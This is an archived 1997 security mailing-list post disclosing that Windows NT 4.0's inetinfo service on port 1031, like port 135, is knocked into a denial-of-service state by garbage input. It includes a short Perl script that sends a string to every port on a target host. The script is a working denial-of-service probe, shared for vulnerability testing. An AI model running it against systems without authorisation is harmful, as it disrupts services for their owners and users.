|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[NTSEC] NT vulnerable to DOS attack on more than just port 135
Bob Beck (beck
obtuse.com)Sat, 25 Jan 1997 12:06:11 -0600
- Messages sorted by: [ date ][ thread ][ subject ][ author ]
- Next message: Christoph Martin: "ssl(-mz)telnet with /tmp raise"
- Previous message: David Hedley: "hey, guess what! another Irix buffer overflow!"
Looks like NT is also vulnerable to exactly the same attack as
previously posted WRT connecting and throwing garbage at port 135 on
another port, namely 1031 (inetinfo) The inetinfo.exe process goes
insane on NT4.0. Haven't tested on 3.51. To try, telnet to 1031 on an
NT machine and type garbage, then disconnect.
Below is what me and Chris Bayly (Chris.Baylyualberta.ca) rigged up to
check.
-Bob
---------------------------------------------------------------------------
Bob Beck Obtuse Systems Corporation
beckobtuse.com http://www.obtuse.com/
True Evil hides its real intentions in its street address. Search and you
shall find it, and the truth shall set you free.
------------------------------8<----------------------------------
#!/usr/local/bin/perl
use Socket;
use FileHandle;
require "chat2.pl";
$ILoveBill = $ARGV[0] && shift;
$verbose = 0; # tell me what you're hitting
$knownports = 0; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{
if ($knownports && ($port == 135 || $port== 1031)) {
next;
}
$fh = chat::open_port($ILoveBill, $port);
chat::print ($fh,"Windows NT is the platform of the future");
if ($verbose) {
print "Trying port: $port\n\n";
}
chat::close($fh);
}
- Next message: Christoph Martin: "ssl(-mz)telnet with /tmp raise"
- Previous message: David Hedley: "hey, guess what! another Irix buffer overflow!"